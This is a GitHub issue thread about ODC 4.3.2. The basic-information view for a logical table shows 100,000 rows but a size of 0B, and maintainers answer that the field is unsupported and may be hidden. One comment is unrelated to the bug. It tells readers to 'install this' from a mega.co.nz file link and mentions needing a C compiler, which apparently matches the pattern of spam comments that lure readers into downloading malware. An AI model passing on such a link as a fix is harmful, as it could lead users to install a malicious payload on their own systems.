### ISSUE TITLE
[Bug]: View the structure of the logical table and the sum of the rows displayed in Basic Information Size mismatch

### ISSUE THREAD

**Issue by qymsummer** [oceanbase/odc#3451]
### ODC version

4.3.2

### OB version

no related

### What happened?

![image](https://github.com/user-attachments/assets/317c8c42-ae5a-4d80-9c27-8107e922ce5f)
View the structure of the logical table and the sum of the rows displayed in Basic Information
The size does not match, the number of rows is 10w, and the size is 0B

### What did you expect to happen?

The number and size of rows should be within a reasonable range

### How can we reproduce it (as minimally and precisely as possible)?

Select a logical table, click View Table Structure, view basic information, and focus on the number and size of rows

**Comment by Aljallaf100** [comment]
install this
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic

you may need to install the c compiler

**Comment by MarkPotato777** [comment]
This info is not supported in the logical table, we may hide it.

**Comment by sl01388797** [comment]
![Image](https://github.com/user-attachments/assets/b0c60201-6024-49cf-92ed-8c80416dd6ff)
pass
